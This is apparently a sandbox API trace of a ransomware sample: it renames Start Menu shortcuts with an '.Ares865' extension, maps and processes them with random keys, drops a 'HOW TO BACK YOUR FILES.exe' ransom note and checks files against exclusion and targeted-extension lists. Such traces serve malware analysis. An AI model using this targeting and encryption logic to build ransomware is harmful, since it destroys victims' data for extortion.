[0092.703] lstrlenW (lpString=".ini") returned 4 [0092.703] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".ini") returned 1 [0092.703] lstrlenW (lpString=".sys") returned 4 [0092.703] lstrcmpiW (lpString1="Narrator.lnk", lpString2=".sys") returned 1 [0092.703] lstrlenW (lpString="Narrator.lnk") returned 12 [0092.703] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.Ares865") returned 96 [0092.703] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\narrator.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.ares865"), dwFlags=0x1) returned 1 [0092.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.705] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1262) returned 1 [0092.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.705] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.706] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.706] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.706] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x15c [0092.708] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0092.709] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.710] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.710] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.711] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.711] CloseHandle (hObject=0x15c) returned 1 [0092.711] CloseHandle (hObject=0x118) returned 1 [0092.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.711] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 1 [0092.711] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.711] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="aoldtz.exe") returned 1 [0092.711] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".") returned 1 [0092.711] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="..") returned 1 [0092.711] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="windows") returned -1 [0092.711] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="bootmgr") returned 1 [0092.711] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="temp") returned -1 [0092.711] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="pagefile.sys") returned -1 [0092.711] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="boot") returned 1 [0092.711] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="ids.txt") returned 1 [0092.711] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="ntuser.dat") returned 1 [0092.712] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="perflogs") returned -1 [0092.712] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="MSBuild") returned 1 [0092.712] lstrlenW (lpString="On-Screen Keyboard.lnk") returned 22 [0092.712] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk") returned 88 [0092.712] lstrcpyW (in: lpString1=0x2cce498, lpString2="On-Screen Keyboard.lnk" | out: lpString1="On-Screen Keyboard.lnk") returned="On-Screen Keyboard.lnk" [0092.712] lstrlenW (lpString="On-Screen Keyboard.lnk") returned 22 [0092.712] lstrlenW (lpString="Ares865") returned 7 [0092.712] lstrcmpiW (lpString1="ard.lnk", lpString2="Ares865") returned -1 [0092.712] lstrlenW (lpString=".dll") returned 4 [0092.712] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".dll") returned 1 [0092.712] lstrlenW (lpString=".lnk") returned 4 [0092.712] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".lnk") returned 1 [0092.712] lstrlenW (lpString=".ini") returned 4 [0092.712] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".ini") returned 1 [0092.712] lstrlenW (lpString=".sys") returned 4 [0092.712] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2=".sys") returned 1 [0092.712] lstrlenW (lpString="On-Screen Keyboard.lnk") returned 22 [0092.712] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.Ares865") returned 106 [0092.712] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.ares865"), dwFlags=0x1) returned 1 [0092.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.714] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1250) returned 1 [0092.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.714] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.715] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.715] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.715] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x15c [0092.717] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0092.718] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.719] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.719] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.719] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.719] CloseHandle (hObject=0x15c) returned 1 [0092.719] CloseHandle (hObject=0x118) returned 1 [0092.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.720] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 0 [0092.720] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.720] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0092.720] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0092.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2edc68 | out: hHeap=0x2b0000) returned 1 [0092.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0092.720] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned 36 [0092.720] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0092.720] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.720] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.721] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.721] GetLastError () returned 0x0 [0092.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.721] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.721] CloseHandle (hObject=0x120) returned 1 [0092.721] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.721] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.722] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d111ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.722] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.722] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.722] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.722] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d111ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.722] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.722] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.722] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.722] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.722] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x639ff80f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Compressed (zipped) Folder.ZFSendToTarget", cAlternateFileName="COMPRE~1.ZFS")) returned 1 [0092.722] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.722] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="aoldtz.exe") returned 1 [0092.722] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".") returned 1 [0092.722] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="..") returned 1 [0092.722] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="windows") returned -1 [0092.722] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="bootmgr") returned 1 [0092.722] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="temp") returned -1 [0092.722] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="pagefile.sys") returned -1 [0092.722] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="boot") returned 1 [0092.723] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="ids.txt") returned -1 [0092.723] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="ntuser.dat") returned -1 [0092.723] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="perflogs") returned -1 [0092.723] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="MSBuild") returned -1 [0092.723] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget") returned 41 [0092.723] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*") returned 38 [0092.723] lstrcpyW (in: lpString1=0x2cce44a, lpString2="Compressed (zipped) Folder.ZFSendToTarget" | out: lpString1="Compressed (zipped) Folder.ZFSendToTarget") returned="Compressed (zipped) Folder.ZFSendToTarget" [0092.723] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget") returned 41 [0092.723] lstrlenW (lpString="Ares865") returned 7 [0092.723] lstrcmpiW (lpString1="oTarget", lpString2="Ares865") returned 1 [0092.723] lstrlenW (lpString=".dll") returned 4 [0092.723] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".dll") returned 1 [0092.723] lstrlenW (lpString=".lnk") returned 4 [0092.723] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".lnk") returned 1 [0092.723] lstrlenW (lpString=".ini") returned 4 [0092.723] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".ini") returned 1 [0092.723] lstrlenW (lpString=".sys") returned 4 [0092.723] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".sys") returned 1 [0092.723] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget") returned 41 [0092.723] lstrlenW (lpString="bak") returned 3 [0092.723] lstrcmpiW (lpString1="get", lpString2="bak") returned 1 [0092.723] lstrlenW (lpString="ba_") returned 3 [0092.723] lstrcmpiW (lpString1="get", lpString2="ba_") returned 1 [0092.723] lstrlenW (lpString="dbb") returned 3 [0092.723] lstrcmpiW (lpString1="get", lpString2="dbb") returned 1 [0092.723] lstrlenW (lpString="vmdk") returned 4 [0092.723] lstrcmpiW (lpString1="rget", lpString2="vmdk") returned -1 [0092.723] lstrlenW (lpString="rar") returned 3 [0092.723] lstrcmpiW (lpString1="get", lpString2="rar") returned -1 [0092.723] lstrlenW (lpString="zip") returned 3 [0092.723] lstrcmpiW (lpString1="get", lpString2="zip") returned -1 [0092.723] lstrlenW (lpString="tgz") returned 3 [0092.723] lstrcmpiW (lpString1="get", lpString2="tgz") returned -1 [0092.723] lstrlenW (lpString="vbox") returned 4 [0092.723] lstrcmpiW (lpString1="rget", lpString2="vbox") returned -1 [0092.723] lstrlenW (lpString="vdi") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="vdi") returned -1 [0092.724] lstrlenW (lpString="vhd") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="vhd") returned -1 [0092.724] lstrlenW (lpString="vhdx") returned 4 [0092.724] lstrcmpiW (lpString1="rget", lpString2="vhdx") returned -1 [0092.724] lstrlenW (lpString="avhd") returned 4 [0092.724] lstrcmpiW (lpString1="rget", lpString2="avhd") returned 1 [0092.724] lstrlenW (lpString="db") returned 2 [0092.724] lstrcmpiW (lpString1="et", lpString2="db") returned 1 [0092.724] lstrlenW (lpString="db2") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="db2") returned 1 [0092.724] lstrlenW (lpString="db3") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="db3") returned 1 [0092.724] lstrlenW (lpString="dbf") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="dbf") returned 1 [0092.724] lstrlenW (lpString="mdf") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="mdf") returned -1 [0092.724] lstrlenW (lpString="mdb") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="mdb") returned -1 [0092.724] lstrlenW (lpString="sql") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="sql") returned -1 [0092.724] lstrlenW (lpString="sqlite") returned 6 [0092.724] lstrcmpiW (lpString1="Target", lpString2="sqlite") returned 1 [0092.724] lstrlenW (lpString="sqlite3") returned 7 [0092.724] lstrcmpiW (lpString1="oTarget", lpString2="sqlite3") returned -1 [0092.724] lstrlenW (lpString="sqlitedb") returned 8 [0092.724] lstrcmpiW (lpString1="ToTarget", lpString2="sqlitedb") returned 1 [0092.724] lstrlenW (lpString="xml") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="xml") returned -1 [0092.724] lstrlenW (lpString="$er") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="$er") returned 1 [0092.724] lstrlenW (lpString="4dd") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="4dd") returned 1 [0092.724] lstrlenW (lpString="4dl") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="4dl") returned 1 [0092.724] lstrlenW (lpString="^^^") returned 3 [0092.724] lstrcmpiW (lpString1="get", lpString2="^^^") returned 1 [0092.725] lstrlenW (lpString="abs") returned 3 [0092.725] lstrcmpiW (lpString1="get", lpString2="abs") returned 1 [0092.725] lstrlenW (lpString="abx") returned 3 [0092.725] lstrcmpiW (lpString1="get", lpString2="abx") returned 1 [0092.725] lstrlenW (lpString="accdb") returned 5 [0092.725] lstrcmpiW (lpString1="arget", lpString2="accdb") returned 1 [0092.725] lstrlenW (lpString="accdc") returned 5 [0092.725] lstrcmpiW (lpString1="arget", lpString2="accdc") returned 1 [0092.725] lstrlenW (lpString="accde") returned 5 [0092.725] lstrcmpiW (lpString1="arget", lpString2="accde") returned 1 [0092.725] lstrlenW (lpString="accdr") returned 5 [0092.725] lstrcmpiW (lpString1="arget", lpString2="accdr") returned 1 [0092.725] lstrlenW (lpString="accdt") returned 5 [0092.725] lstrcmpiW (lpString1="arget", lpString2="accdt") returned 1 [0092.725] lstrlenW (lpString="accdw") returned 5 [0092.725] lstrcmpiW (lpString1="arget", lpString2="accdw") returned 1 [0092.725] lstrlenW (lpString="accft") returned 5 [0092.725] lstrcmpiW (lpString1="arget", lpString2="accft") returned 1 [0092.725] lstrlenW (lpString="adb") returned 3 [0092.725] lstrcmpiW (lpString1="get", lpString2="adb") returned 1 [0092.725] lstrlenW (lpString="adb") returned 3 [0092.725] lstrcmpiW (lpString1="get", lpString2="adb") returned 1 [0092.725] lstrlenW (lpString="ade") returned 3 [0092.725] lstrcmpiW (lpString1="get", lpString2="ade") returned 1 [0092.725] lstrlenW (lpString="adf") returned 3 [0092.725] lstrcmpiW (lpString1="get", lpString2="adf") returned 1 [0092.725] lstrlenW (lpString="adn") returned 3 [0092.725] lstrcmpiW (lpString1="get", lpString2="adn") returned 1 [0092.725] lstrlenW (lpString="adp") returned 3 [0092.725] lstrcmpiW (lpString1="get", lpString2="adp") returned 1 [0092.725] lstrlenW (lpString="alf") returned 3 [0092.725] lstrcmpiW (lpString1="get", lpString2="alf") returned 1 [0092.725] lstrlenW (lpString="ask") returned 3 [0092.725] lstrcmpiW (lpString1="get", lpString2="ask") returned 1 [0092.725] lstrlenW (lpString="btr") returned 3 [0092.725] lstrcmpiW (lpString1="get", lpString2="btr") returned 1 [0092.726] lstrlenW (lpString="cat") returned 3 [0092.726] lstrcmpiW (lpString1="get", lpString2="cat") returned 1 [0092.726] lstrlenW (lpString="cdb") returned 3 [0092.726] lstrcmpiW (lpString1="get", lpString2="cdb") returned 1 [0092.726] lstrlenW (lpString="ckp") returned 3 [0092.726] lstrcmpiW (lpString1="get", lpString2="ckp") returned 1 [0092.726] lstrlenW (lpString="cma") returned 3 [0092.726] lstrcmpiW (lpString1="get", lpString2="cma") returned 1 [0092.726] lstrlenW (lpString="cpd") returned 3 [0092.726] lstrcmpiW (lpString1="get", lpString2="cpd") returned 1 [0092.726] lstrlenW (lpString="dacpac") returned 6 [0092.726] lstrcmpiW (lpString1="Target", lpString2="dacpac") returned 1 [0092.726] lstrlenW (lpString="dad") returned 3 [0092.726] lstrcmpiW (lpString1="get", lpString2="dad") returned 1 [0092.726] lstrlenW (lpString="dadiagrams") returned 10 [0092.726] lstrcmpiW (lpString1="ndToTarget", lpString2="dadiagrams") returned 1 [0092.726] lstrlenW (lpString="daschema") returned 8 [0092.726] lstrcmpiW (lpString1="ToTarget", lpString2="daschema") returned 1 [0092.726] lstrlenW (lpString="db-journal") returned 10 [0092.726] lstrcmpiW (lpString1="ndToTarget", lpString2="db-journal") returned 1 [0092.726] lstrlenW (lpString="db-shm") returned 6 [0092.726] lstrcmpiW (lpString1="Target", lpString2="db-shm") returned 1 [0092.726] lstrlenW (lpString="db-wal") returned 6 [0092.726] lstrcmpiW (lpString1="Target", lpString2="db-wal") returned 1 [0092.726] lstrlenW (lpString="dbc") returned 3 [0092.726] lstrcmpiW (lpString1="get", lpString2="dbc") returned 1 [0092.726] lstrlenW (lpString="dbs") returned 3 